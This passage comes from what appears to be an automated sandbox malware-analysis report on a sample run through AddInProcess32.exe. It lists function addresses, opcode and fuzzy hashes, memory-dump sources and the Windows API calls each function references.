Opcode ID: 8e832f2335115d6f4c99081bda0847281d438b3564892d2c0d825395eb5740c2
Instruction ID: bf6dd42c34f92314de470996e6ccbe33a26f2ca612e8a9a2228b14dd398bd71c
Opcode Fuzzy Hash: 8e832f2335115d6f4c99081bda0847281d438b3564892d2c0d825395eb5740c2
Instruction Fuzzy Hash: CA21C47090CB4C8FDB29DB98D849BE9BBF0EF56320F00416FD08AC3152DA746445CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B980E29 Relevance: .9, Instructions: 885COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1820292062.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7785bc41dc52140cd374be4024fa5aff0824c7eb1fd56cf2b9d2224e2ee5fd0a
Instruction ID: f18a06fd14d5fb7b807f6f42fbac1ee59bd31e2a98e429ce5cbb9a5caa2cc11c
Opcode Fuzzy Hash: 7785bc41dc52140cd374be4024fa5aff0824c7eb1fd56cf2b9d2224e2ee5fd0a
Instruction Fuzzy Hash: 17424C32A1EBD94FE766DB7888655A47FE0EF56304F0A01FFD489CB0A3D9286906C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B981269 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1820292062.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96194bf32e23b755a630ff0110478f23fa794c879b11ec3008acb5d5a116d43
Instruction ID: 2e1bd80420cb4382b37a9e5d80efe68d6fdacfa7e35bfb172077dcf1cc162145
Opcode Fuzzy Hash: d96194bf32e23b755a630ff0110478f23fa794c879b11ec3008acb5d5a116d43
Instruction Fuzzy Hash: 99412531A0DA8D4FDB56DB64C8A44E47FF0FF5A304B0601BBD04ACB5A2DA38B945C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9809FC Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1820292062.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7942119acd962995aa602ff4a1e9dff5f73dec1237880ec90e0b969c8fcfec29
Instruction ID: 1a28d1dd61cf8ebc29e491d05c49413294b947b59129103402c8fafbbc462bd0
Opcode Fuzzy Hash: 7942119acd962995aa602ff4a1e9dff5f73dec1237880ec90e0b969c8fcfec29
Instruction Fuzzy Hash: 0DE0E535B056298ADF64EB48D891BE9B3B1EF88300F0041E6D55EA3291CA346A848F52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B89CE19 Relevance: .7, Instructions: 707COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad1fcc7216d13920e3dfa703d2c3a474df2f8cb6fe5b4f967686e26793dbb406
Instruction ID: a463101b385d11a49356555ae0fea97a81d30e2ff3a1b3fbe1369edd42376d61
Opcode Fuzzy Hash: ad1fcc7216d13920e3dfa703d2c3a474df2f8cb6fe5b4f967686e26793dbb406
Instruction Fuzzy Hash: 20222A30B1DA4A4FEB299B6888615747BE0FF56314F5542BEC08BC71E7DA28F8438785

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89246D Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1819756313.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b890000_M_F+niestandardowy stempel.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18ac3023f760c4349b5572acc927f14ba4e807e7b2503e6af4cb79f19f18f8a7
Instruction ID: 6e777619a118ff5f0fc108d20e5923da3918ccd6cd5b969863019a6c785180c8
Opcode Fuzzy Hash: 18ac3023f760c4349b5572acc927f14ba4e807e7b2503e6af4cb79f19f18f8a7
Instruction Fuzzy Hash: A602F33171DA494FEB6DEFA888646717BE1EF99300F1500B9D44EC76E6DE25F8428780

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AddInProcess32.exePID: 2060, Parent PID: 6696COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	147
Total number of Limit Nodes:	15

Executed Functions

Function 06913050 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 069137A8
$dq, xrefs: 0691375B
$dq, xrefs: 0691374F
$dq, xrefs: 06913778
$dq, xrefs: 0691379C
$dq, xrefs: 06913784

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: f3e95f7a0885d818fc55218d526affb16b537a0ff34e73c34ac626315b5b6a19
Instruction ID: a21eff0c6983a2abefcb635f6cc5f73ef8a5547f13924a26d9fc6818320c97fb
Opcode Fuzzy Hash: f3e95f7a0885d818fc55218d526affb16b537a0ff34e73c34ac626315b5b6a19
Instruction Fuzzy Hash: 13322F31E10619CFCB15EF75C85459DB7B6FFC9300F6186AAD409AB664EB30AE85CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06917D78 Relevance: 3.0, Strings: 2, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 069180B5
$dq, xrefs: 069180C1

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: f2ef72278e5c9c946e238cd7652e08faeaf0270f243d3637148acb1532061ca9
Instruction ID: c19a93ecd9cfa6d0113aabc1c116e041afc46b8fe5f704d658a6ea322c9728a2
Opcode Fuzzy Hash: f2ef72278e5c9c946e238cd7652e08faeaf0270f243d3637148acb1532061ca9
Instruction Fuzzy Hash: 03028D30B0021A9FDB54DF68DA94AAEB7E6FF84311F248929D405DB794DB31ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 069155A0 Relevance: 1.8, Strings: 1, Instructions: 593COMMON

Download Yara Rule

Strings

$, xrefs: 0691592C

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 48e664e3c2ec9438fda0466a193189a141453cf2e99a71a07e6d2b697278b338
Instruction ID: d1344782a4257da8d30dd9a48c519cdb22c69ce2d014d0f35a9dcd0be5896f66
Opcode Fuzzy Hash: 48e664e3c2ec9438fda0466a193189a141453cf2e99a71a07e6d2b697278b338
Instruction Fuzzy Hash: 0822AEB1E002098FDF60DFA4C5806AEBBB6EFC5310F36846AD455AF794DA359C41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 069165E8 Relevance: .8, Instructions: 815COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9f203c4996e39bb8eb5068723522309283e79be7f774616cc566c6e0d180504
Instruction ID: b254aacafb738164c669aff266f2416ddaf9bf12a90ffd0bf5b3c7faa0cdb532
Opcode Fuzzy Hash: d9f203c4996e39bb8eb5068723522309283e79be7f774616cc566c6e0d180504
Instruction Fuzzy Hash: DE628934F002099FDB54DB68D594AADB7F6EB84310F248469E80ADF794DB35ED46CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0691C180 Relevance: .6, Instructions: 640COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb774123ff62f7ae9ab1aae1f120bd3b0ff9d2052674a62d4baf1f84993d6ea6
Instruction ID: b76daa93c9a1ccf32d432a504ae4587c3366990bbba0fa1c95cb18763785fe4b
Opcode Fuzzy Hash: eb774123ff62f7ae9ab1aae1f120bd3b0ff9d2052674a62d4baf1f84993d6ea6
Instruction Fuzzy Hash: 43327B74A0020DDFDB54DF68D994BADB7B6FB88311F208929E405EB794DB34EC428B91

Uniqueness

Uniqueness Score: -1.00%

Function 0691B228 Relevance: .6, Instructions: 558COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89cab2715228a5e8b66879036e63bbab8871c769e61c258249558a92eb968b1d
Instruction ID: 416dc9eec8a27829f45eeb655e7fa34ccd3cfae04108ecc7c31dfe864b941165
Opcode Fuzzy Hash: 89cab2715228a5e8b66879036e63bbab8871c769e61c258249558a92eb968b1d
Instruction Fuzzy Hash: 2E223D70E1020D8BDF64DB68D5947AEB7B7EB49310F74882AE409DBB99CA34DC81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0691ACD0 Relevance: 10.4, Strings: 8, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 0691AE7F
$dq, xrefs: 0691AE9C
$dq, xrefs: 0691AE73
$dq, xrefs: 0691ADFD
$dq, xrefs: 0691AE44
$dq, xrefs: 0691ADF1
$dq, xrefs: 0691AE50
$dq, xrefs: 0691AEA8

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-634254105
Opcode ID: 328dd1703a319a0f788ac62cc370487b118f229a3e91c06aaa54c2db40fc98e0
Instruction ID: 0691ae792ce9cbd103e68095387c58f9942c7019a87f02578790216367a17af0
Opcode Fuzzy Hash: 328dd1703a319a0f788ac62cc370487b118f229a3e91c06aaa54c2db40fc98e0
Instruction Fuzzy Hash: 85E16D70E112198FDB65DB68D8906AEB7B7FF84311F30892AD8099B758DB309D46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0691B648 Relevance: 8.0, Strings: 6, Instructions: 470COMMON

Download Yara Rule

Strings

$dq, xrefs: 0691BBB3
$dq, xrefs: 0691BBA7
$dq, xrefs: 0691BBE7
$dq, xrefs: 0691BB73
$dq, xrefs: 0691BB7F
$dq, xrefs: 0691BBDB

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq$$dq$$dq
API String ID: 0-2331353128
Opcode ID: 64364682475ea6fbb8a3c60dc37ad1287e1b58c01ec7ea532d8795ae66e3f744
Instruction ID: 92561e6c71d88b139aabfbd2a02d9570f87d9314bde73bf68d049a2fa798177b
Opcode Fuzzy Hash: 64364682475ea6fbb8a3c60dc37ad1287e1b58c01ec7ea532d8795ae66e3f744
Instruction Fuzzy Hash: C7025C30E0020E8FDFA4DF68D5906ADB7A6EB45314F30896AE415DFA59DB34EC81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06902E02 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06902E86
GetCurrentThread.KERNEL32 ref: 06902EC3
GetCurrentProcess.KERNEL32 ref: 06902F00
GetCurrentThreadId.KERNEL32 ref: 06902F59

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e277ebc467d03efe70f12b89cfb8c8071351663f2487ca4b4a61225e5cdd5e40
Instruction ID: 53a20d0765a2d96642fa7f664611995688ebd2957f9193fd4fd7181f0d89a8dd
Opcode Fuzzy Hash: e277ebc467d03efe70f12b89cfb8c8071351663f2487ca4b4a61225e5cdd5e40
Instruction Fuzzy Hash: 115157B09003098FDB54DFA9D948BEEBBF5EF88310F208459E519A7390D7745984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06902E08 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 06902E86
GetCurrentThread.KERNEL32 ref: 06902EC3
GetCurrentProcess.KERNEL32 ref: 06902F00
GetCurrentThreadId.KERNEL32 ref: 06902F59

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: aa5de9dfd0a5c3432a59eca91d056b572222e07582a98d431836b5e240518b5c
Instruction ID: ac943b15ad912849abc6bab07b72755feeb8cfbad25ed1593b8ece46eb255e25
Opcode Fuzzy Hash: aa5de9dfd0a5c3432a59eca91d056b572222e07582a98d431836b5e240518b5c
Instruction Fuzzy Hash: 6E5157B09003098FDB54DFA9D948BEEBBF5FF88310F208459E519A7290D7745984CF65

Uniqueness

Uniqueness Score: -1.00%

Function 06919150 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 069191A3
$dq, xrefs: 069191DE
$dq, xrefs: 069191D2
$dq, xrefs: 06919197

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq$$dq
API String ID: 0-185584874
Opcode ID: 62f72cba26351b789b74af596b808c77f619c28ca0cc0453067c5d06e5c227c7
Instruction ID: 538235200e689c0a0cd5f1da676951ccee3aae9540c4dca069a5c7913cb9e2ae
Opcode Fuzzy Hash: 62f72cba26351b789b74af596b808c77f619c28ca0cc0453067c5d06e5c227c7
Instruction Fuzzy Hash: 96914230B1021E9FDB54DF64D964BAEB7F6AF85604F208469D80DEB384EE70DD428B91

Uniqueness

Uniqueness Score: -1.00%

Function 0691CF40 Relevance: 4.5, Strings: 3, Instructions: 799
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 0691D33F
$dq, xrefs: 0691D34B
$dq, xrefs: 0691D337

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq$$dq
API String ID: 0-2861643491
Opcode ID: 5df227c7f6d49f2c835429bac28c04f7cb5622cad9b2464170755d76a3439fd2
Instruction ID: c9070e2935d5948238d1b8eba8a1ebe6fe6d64e8365a8464a7f357694712613f
Opcode Fuzzy Hash: 5df227c7f6d49f2c835429bac28c04f7cb5622cad9b2464170755d76a3439fd2
Instruction Fuzzy Hash: 7B627270B0021A8FCB55EF68D590A5EB7F2FF85311B208968D4099F759DB71ED86CB80

Uniqueness

Uniqueness Score: -1.00%

Function 06914B60 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPiq, xrefs: 06914C8D
fiq, xrefs: 0691526D
\Oiq, xrefs: 06914D17

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: fiq$XPiq$\Oiq
API String ID: 0-1639307521
Opcode ID: 9905ea70ce3cc123f668d2bfd7c1338c3282f84512d7856b4c48d4dc45c0fd04
Instruction ID: b0331418de6a82495055b6ab3d9a43c0fb670c990348886938c453227ef3c95c
Opcode Fuzzy Hash: 9905ea70ce3cc123f668d2bfd7c1338c3282f84512d7856b4c48d4dc45c0fd04
Instruction Fuzzy Hash: 0F616C71E002199FEF549FA9C8147AEBBF6FF88700F20842AD506EB395DA719C45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06919140 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$dq, xrefs: 069191D2
$dq, xrefs: 06919197

Memory Dump Source

Source File: 00000002.00000002.2891727001.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6910000_AddInProcess32.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: 4ada7519c01997dbc059f62497eaf03a6a6ac53efb95f4f5bd65ad54d0d3d927
Instruction ID: 457003c2baa4d0e79f064fafda3409bb3f195841e3dfc63ed15bf88ec17eee78
Opcode Fuzzy Hash: 4ada7519c01997dbc059f62497eaf03a6a6ac53efb95f4f5bd65ad54d0d3d927
Instruction Fuzzy Hash: 52517430B0010A9FDB54DF74D964B6EB7FAAFC9650F208469C809DB398EA30DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0690B318 Relevance: 1.7, APIs: 1, Instructions: 203COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0690B57E

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6d972b0dc0aa3997728fa68ac08459f9617c421d42e75da699aaf7266d754fff
Instruction ID: 02ecc99b360e3677476816ed011fa39fdd075a89d2c9086383c5c131fbc527ad
Opcode Fuzzy Hash: 6d972b0dc0aa3997728fa68ac08459f9617c421d42e75da699aaf7266d754fff
Instruction Fuzzy Hash: 9981AA70A00B059FE7A4DF2AD44075ABBF5FF88300F108A2DD48AD7A94DB36E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0690D4B0 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0690D622

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a704e17a3bdb8e7448c54fc3e82b8db5b784fd4e798d9f46a6bf946993499f91
Instruction ID: 108eefde11dcfab0d36ca2e5f0be82a5823eab2528c5cfbd1e9c5e9b514b9036
Opcode Fuzzy Hash: a704e17a3bdb8e7448c54fc3e82b8db5b784fd4e798d9f46a6bf946993499f91
Instruction Fuzzy Hash: 795111B5C00249AFDF15CF99C980ADDBFB6FF48300F24816AE818AB261D7719955CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02F3EB08 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2886402100.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f30000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c44524201202fb47917f7aee29de09ef63ddae246d49d692253379341d372ce
Instruction ID: 70d69cf82d2235393c94443a894bd13ea27c9244d2dba82cebb9813d761829a8
Opcode Fuzzy Hash: 4c44524201202fb47917f7aee29de09ef63ddae246d49d692253379341d372ce
Instruction Fuzzy Hash: F1413272D0038A8FCB05DFA9D8006EEBBF5AFC9310F15856AD944A7381DB389844CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 0690D510 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0690D622

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c7e3c0ed2f99b5e26dd51c6b3ca7549f2efe5bb4b73568c5da716f5aa837903d
Instruction ID: 916860f1a1f9623f5ad77c388f57b0335e2fb7c68e0f428018e29bda9f87c572
Opcode Fuzzy Hash: c7e3c0ed2f99b5e26dd51c6b3ca7549f2efe5bb4b73568c5da716f5aa837903d
Instruction Fuzzy Hash: 9F41DEB5C00309DFDB14CF99C884ADEBBB5FF88310F24812AE819AB250D771A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0690E49C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0690FD11

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: ecc807976f08818bc86c966fb315e998cfbbd62d81adf57d93998ba1cf8148be
Instruction ID: db394445ed834ef5b6c0edfb828b58c56504c86789d8cbd71b1f4f9edf2bcac9
Opcode Fuzzy Hash: ecc807976f08818bc86c966fb315e998cfbbd62d81adf57d93998ba1cf8148be
Instruction Fuzzy Hash: 8A416DB4900305CFDB54CF59C449AAABBF5FF88314F24C859D919AB761C774A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06903048 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069030D7

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 22886c4a0624ad0c7f34903acf13fe4a689eb8a4e8a29d267246f2145639c9d6
Instruction ID: 25dd982f2bdbc3c2fdf25428e06a44020fb5c991706406959617838bbd2b6fb5
Opcode Fuzzy Hash: 22886c4a0624ad0c7f34903acf13fe4a689eb8a4e8a29d267246f2145639c9d6
Instruction Fuzzy Hash: A121D2B5D002099FDB10CFAAD984ADEFBF8EB48320F14841AE959A3250D375A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 06903050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 069030D7

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6e313cbef4dc4bfd796e68ac4a7f6c5ad9857fd91a733a12948c0eba62bf9f4e
Instruction ID: 2e2b2ffbaeaabb5e8b77466b2966b5e9429dcfa5e676d53b6dacab467a4ea0e6
Opcode Fuzzy Hash: 6e313cbef4dc4bfd796e68ac4a7f6c5ad9857fd91a733a12948c0eba62bf9f4e
Instruction Fuzzy Hash: 8F21E4B5D003099FDB10CF9AD884ADEFBF8EB48310F14801AE918A3350C375A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0690A2D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0690B5F9,00000800,00000000,00000000), ref: 0690B7EA

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e21a1efceaa3b7e2a8dd27245cf7c12355a747700637052d499a544f7e6fe3e
Instruction ID: 33e73fa0cd01b0dd597aca1f568d41e646a84a24ec920b93cf6b8e65bf919241
Opcode Fuzzy Hash: 5e21a1efceaa3b7e2a8dd27245cf7c12355a747700637052d499a544f7e6fe3e
Instruction Fuzzy Hash: E81103B6C003098FDB10CF9AD844A9EFBF8EB48310F10842ED929A7640C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0690B77A Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0690B5F9,00000800,00000000,00000000), ref: 0690B7EA

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8422b26ff19594956a3d07dadc64a1a274628b3ce2d25a1a6f61c64dde177519
Instruction ID: bab70fc821f7c1448c95f356ae4e93f2f1293a6a2da1a3fb6ba8e4faca1a2573
Opcode Fuzzy Hash: 8422b26ff19594956a3d07dadc64a1a274628b3ce2d25a1a6f61c64dde177519
Instruction Fuzzy Hash: 621126BAC003499FDB10CFAAD844ADEFBF8EB48310F20842ED569A7640C775A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F3EBF0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE ref: 02F3EC57

Memory Dump Source

Source File: 00000002.00000002.2886402100.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2f30000_AddInProcess32.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 1397b25e13e761cddcef61a0074d7bbe58e349eb1dea7d13cc6b1943d24b0113
Instruction ID: 1e7fff3356d3bd15a91ef525232fc9de2c63731ad16153a66a283a70b6f1c81b
Opcode Fuzzy Hash: 1397b25e13e761cddcef61a0074d7bbe58e349eb1dea7d13cc6b1943d24b0113
Instruction Fuzzy Hash: E81112B1C002599BCB10DF9AC544B9EFBF4AF48320F15816AD928B7240D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0690B518 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0690B57E

Memory Dump Source

Source File: 00000002.00000002.2891648701.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6900000_AddInProcess32.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
